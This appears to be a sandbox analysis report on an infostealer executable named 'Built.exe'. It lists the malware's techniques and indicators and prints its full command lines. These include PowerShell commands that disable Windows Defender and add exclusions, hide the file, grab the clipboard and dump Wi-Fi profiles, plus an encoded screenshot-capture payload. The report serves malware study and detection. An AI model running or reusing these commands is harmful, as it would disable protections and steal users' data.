c99ef8a77872dcc4619828d3a89422e5f385b6f6146500f8683e145f968d9aed

Analysis

max time kernel
140s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-11-2024 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

5.9MB
MD5

5bc3f4b5d51eb836a100cfdaeb523463
SHA1

8d7e261a6f9db90cc24cab7ba4b9716ad89b066e
SHA256

c99ef8a77872dcc4619828d3a89422e5f385b6f6146500f8683e145f968d9aed
SHA512

bf5d9b435bbd40038096968ca0404bdfd4f55b231873dceef525bc26c5fee38837eab568da051ace5ee3587aec0c9dfe87ff306416eb1071ddcb0d9e606347c4
SSDEEP

98304:bo+nh24Ri65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeF49h/krfusU6:b7nZDOYjJlpZstQoS9Hf12VKXfb/C0VQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1984	powershell.exe
1100	powershell.exe
3272	powershell.exe
1328	powershell.exe
4740	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5000	powershell.exe
4420	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3028	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe
3988	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4872	tasklist.exe
4560	tasklist.exe
4668	tasklist.exe
4252	tasklist.exe
4932	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4944	cmd.exe

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c9a-21.dat	upx
behavioral2/memory/3988-24-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp	upx
behavioral2/files/0x0007000000023c8d-27.dat	upx
behavioral2/memory/3988-30-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp	upx
behavioral2/files/0x0007000000023c98-29.dat	upx
behavioral2/files/0x0007000000023c94-48.dat	upx
behavioral2/files/0x0007000000023c93-47.dat	upx
behavioral2/files/0x0007000000023c92-46.dat	upx
behavioral2/files/0x0007000000023c91-45.dat	upx
behavioral2/files/0x0007000000023c90-44.dat	upx
behavioral2/files/0x0007000000023c8f-43.dat	upx
behavioral2/files/0x0007000000023c8e-42.dat	upx
behavioral2/files/0x0007000000023c8c-41.dat	upx
behavioral2/files/0x0007000000023c9f-40.dat	upx
behavioral2/files/0x0007000000023c9e-39.dat	upx
behavioral2/files/0x0007000000023c9d-38.dat	upx
behavioral2/files/0x0007000000023c99-35.dat	upx
behavioral2/memory/3988-32-0x00007FFE85890000-0x00007FFE8589F000-memory.dmp	upx
behavioral2/files/0x0007000000023c97-34.dat	upx
behavioral2/memory/3988-54-0x00007FFE7D8C0000-0x00007FFE7D8EC000-memory.dmp	upx
behavioral2/memory/3988-56-0x00007FFE83E90000-0x00007FFE83EA8000-memory.dmp	upx
behavioral2/memory/3988-58-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp	upx
behavioral2/memory/3988-60-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp	upx
behavioral2/memory/3988-62-0x00007FFE7D8A0000-0x00007FFE7D8B9000-memory.dmp	upx
behavioral2/memory/3988-64-0x00007FFE81730000-0x00007FFE8173D000-memory.dmp	upx
behavioral2/memory/3988-66-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp	upx
behavioral2/memory/3988-73-0x00007FFE6DB10000-0x00007FFE6DE87000-memory.dmp	upx
behavioral2/memory/3988-74-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp	upx
behavioral2/memory/3988-78-0x00007FFE7D840000-0x00007FFE7D84D000-memory.dmp	upx
behavioral2/memory/3988-80-0x00007FFE6D830000-0x00007FFE6D948000-memory.dmp	upx
behavioral2/memory/3988-77-0x00007FFE7D850000-0x00007FFE7D865000-memory.dmp	upx
behavioral2/memory/3988-83-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp	upx
behavioral2/memory/3988-81-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp	upx
behavioral2/memory/3988-95-0x00007FFE7D8A0000-0x00007FFE7D8B9000-memory.dmp	upx
behavioral2/memory/3988-71-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp	upx
behavioral2/memory/3988-70-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp	upx
behavioral2/memory/3988-112-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp	upx
behavioral2/memory/3988-125-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp	upx
behavioral2/memory/3988-199-0x00007FFE6DB10000-0x00007FFE6DE87000-memory.dmp	upx
behavioral2/memory/3988-286-0x00007FFE6D830000-0x00007FFE6D948000-memory.dmp	upx
behavioral2/memory/3988-300-0x00007FFE82970000-0x00007FFE8298E000-memory.dmp	upx
behavioral2/memory/3988-295-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp	upx
behavioral2/memory/3988-305-0x00007FFE7CA40000-0x00007FFE7CAF7000-memory.dmp	upx
behavioral2/memory/3988-304-0x00007FFE7D870000-0x00007FFE7D89E000-memory.dmp	upx
behavioral2/memory/3988-301-0x00007FFE7D5C0000-0x00007FFE7D731000-memory.dmp	upx
behavioral2/memory/3988-296-0x00007FFE816F0000-0x00007FFE81714000-memory.dmp	upx
behavioral2/memory/3988-336-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp	upx
behavioral2/memory/3988-351-0x00007FFE6DE90000-0x00007FFE6E2F5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2948	cmd.exe
4976	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
456	WMIC.exe
3304	WMIC.exe
5020	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1676	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1984	powershell.exe
3272	powershell.exe
3272	powershell.exe
1984	powershell.exe
1100	powershell.exe
1100	powershell.exe
5000	powershell.exe
5000	powershell.exe
2908	powershell.exe
2908	powershell.exe
5000	powershell.exe
2908	powershell.exe
1328	powershell.exe
1328	powershell.exe
4692	powershell.exe
4692	powershell.exe
4740	powershell.exe
4740	powershell.exe
1116	powershell.exe
1116	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4252	tasklist.exe
Token: SeDebugPrivilege	1984	powershell.exe
Token: SeDebugPrivilege	3272	powershell.exe
Token: SeIncreaseQuotaPrivilege	4112	WMIC.exe
Token: SeSecurityPrivilege	4112	WMIC.exe
Token: SeTakeOwnershipPrivilege	4112	WMIC.exe
Token: SeLoadDriverPrivilege	4112	WMIC.exe
Token: SeSystemProfilePrivilege	4112	WMIC.exe
Token: SeSystemtimePrivilege	4112	WMIC.exe
Token: SeProfSingleProcessPrivilege	4112	WMIC.exe
Token: SeIncBasePriorityPrivilege	4112	WMIC.exe
Token: SeCreatePagefilePrivilege	4112	WMIC.exe
Token: SeBackupPrivilege	4112	WMIC.exe
Token: SeRestorePrivilege	4112	WMIC.exe
Token: SeShutdownPrivilege	4112	WMIC.exe
Token: SeDebugPrivilege	4112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4112	WMIC.exe
Token: SeRemoteShutdownPrivilege	4112	WMIC.exe
Token: SeUndockPrivilege	4112	WMIC.exe
Token: SeManageVolumePrivilege	4112	WMIC.exe
Token: 33	4112	WMIC.exe
Token: 34	4112	WMIC.exe
Token: 35	4112	WMIC.exe
Token: 36	4112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4112	WMIC.exe
Token: SeSecurityPrivilege	4112	WMIC.exe
Token: SeTakeOwnershipPrivilege	4112	WMIC.exe
Token: SeLoadDriverPrivilege	4112	WMIC.exe
Token: SeSystemProfilePrivilege	4112	WMIC.exe
Token: SeSystemtimePrivilege	4112	WMIC.exe
Token: SeProfSingleProcessPrivilege	4112	WMIC.exe
Token: SeIncBasePriorityPrivilege	4112	WMIC.exe
Token: SeCreatePagefilePrivilege	4112	WMIC.exe
Token: SeBackupPrivilege	4112	WMIC.exe
Token: SeRestorePrivilege	4112	WMIC.exe
Token: SeShutdownPrivilege	4112	WMIC.exe
Token: SeDebugPrivilege	4112	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4112	WMIC.exe
Token: SeRemoteShutdownPrivilege	4112	WMIC.exe
Token: SeUndockPrivilege	4112	WMIC.exe
Token: SeManageVolumePrivilege	4112	WMIC.exe
Token: 33	4112	WMIC.exe
Token: 34	4112	WMIC.exe
Token: 35	4112	WMIC.exe
Token: 36	4112	WMIC.exe
Token: SeIncreaseQuotaPrivilege	456	WMIC.exe
Token: SeSecurityPrivilege	456	WMIC.exe
Token: SeTakeOwnershipPrivilege	456	WMIC.exe
Token: SeLoadDriverPrivilege	456	WMIC.exe
Token: SeSystemProfilePrivilege	456	WMIC.exe
Token: SeSystemtimePrivilege	456	WMIC.exe
Token: SeProfSingleProcessPrivilege	456	WMIC.exe
Token: SeIncBasePriorityPrivilege	456	WMIC.exe
Token: SeCreatePagefilePrivilege	456	WMIC.exe
Token: SeBackupPrivilege	456	WMIC.exe
Token: SeRestorePrivilege	456	WMIC.exe
Token: SeShutdownPrivilege	456	WMIC.exe
Token: SeDebugPrivilege	456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	456	WMIC.exe
Token: SeRemoteShutdownPrivilege	456	WMIC.exe
Token: SeUndockPrivilege	456	WMIC.exe
Token: SeManageVolumePrivilege	456	WMIC.exe
Token: 33	456	WMIC.exe
Token: 34	456	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 3988	3052	Built.exe	85
PID 3052 wrote to memory of 3988	3052	Built.exe	85
PID 3988 wrote to memory of 3924	3988	Built.exe	86
PID 3988 wrote to memory of 3924	3988	Built.exe	86
PID 3988 wrote to memory of 3972	3988	Built.exe	87
PID 3988 wrote to memory of 3972	3988	Built.exe	87
PID 3988 wrote to memory of 1496	3988	Built.exe	90
PID 3988 wrote to memory of 1496	3988	Built.exe	90
PID 3924 wrote to memory of 1984	3924	cmd.exe	92
PID 3924 wrote to memory of 1984	3924	cmd.exe	92
PID 1496 wrote to memory of 4252	1496	cmd.exe	93
PID 1496 wrote to memory of 4252	1496	cmd.exe	93
PID 3972 wrote to memory of 3272	3972	cmd.exe	94
PID 3972 wrote to memory of 3272	3972	cmd.exe	94
PID 3988 wrote to memory of 3592	3988	Built.exe	95
PID 3988 wrote to memory of 3592	3988	Built.exe	95
PID 3592 wrote to memory of 4112	3592	cmd.exe	98
PID 3592 wrote to memory of 4112	3592	cmd.exe	98
PID 3988 wrote to memory of 2456	3988	Built.exe	99
PID 3988 wrote to memory of 2456	3988	Built.exe	99
PID 2456 wrote to memory of 4792	2456	cmd.exe	101
PID 2456 wrote to memory of 4792	2456	cmd.exe	101
PID 3988 wrote to memory of 4296	3988	Built.exe	102
PID 3988 wrote to memory of 4296	3988	Built.exe	102
PID 4296 wrote to memory of 1996	4296	cmd.exe	104
PID 4296 wrote to memory of 1996	4296	cmd.exe	104
PID 3988 wrote to memory of 2180	3988	Built.exe	105
PID 3988 wrote to memory of 2180	3988	Built.exe	105
PID 2180 wrote to memory of 456	2180	cmd.exe	107
PID 2180 wrote to memory of 456	2180	cmd.exe	107
PID 3988 wrote to memory of 780	3988	Built.exe	108
PID 3988 wrote to memory of 780	3988	Built.exe	108
PID 780 wrote to memory of 3304	780	cmd.exe	110
PID 780 wrote to memory of 3304	780	cmd.exe	110
PID 3988 wrote to memory of 4944	3988	Built.exe	111
PID 3988 wrote to memory of 4944	3988	Built.exe	111
PID 3988 wrote to memory of 4784	3988	Built.exe	113
PID 3988 wrote to memory of 4784	3988	Built.exe	113
PID 4944 wrote to memory of 1784	4944	cmd.exe	115
PID 4944 wrote to memory of 1784	4944	cmd.exe	115
PID 4784 wrote to memory of 1100	4784	cmd.exe	116
PID 4784 wrote to memory of 1100	4784	cmd.exe	116
PID 3988 wrote to memory of 4652	3988	Built.exe	118
PID 3988 wrote to memory of 4652	3988	Built.exe	118
PID 3988 wrote to memory of 4212	3988	Built.exe	117
PID 3988 wrote to memory of 4212	3988	Built.exe	117
PID 4212 wrote to memory of 4872	4212	cmd.exe	121
PID 4212 wrote to memory of 4872	4212	cmd.exe	121
PID 4652 wrote to memory of 4932	4652	cmd.exe	122
PID 4652 wrote to memory of 4932	4652	cmd.exe	122
PID 3988 wrote to memory of 4460	3988	Built.exe	123
PID 3988 wrote to memory of 4460	3988	Built.exe	123
PID 3988 wrote to memory of 4420	3988	Built.exe	124
PID 3988 wrote to memory of 4420	3988	Built.exe	124
PID 3988 wrote to memory of 1620	3988	Built.exe	126
PID 3988 wrote to memory of 1620	3988	Built.exe	126
PID 3988 wrote to memory of 4196	3988	Built.exe	129
PID 3988 wrote to memory of 4196	3988	Built.exe	129
PID 3988 wrote to memory of 2948	3988	Built.exe	178
PID 3988 wrote to memory of 2948	3988	Built.exe	178
PID 1620 wrote to memory of 4560	1620	cmd.exe	131
PID 1620 wrote to memory of 4560	1620	cmd.exe	131
PID 4420 wrote to memory of 5000	4420	cmd.exe	135
PID 4420 wrote to memory of 5000	4420	cmd.exe	135

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1784	attrib.exe
4576	attrib.exe
3552	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1496
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4296
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4212
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4652
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4196
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2948
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1656
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3460
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1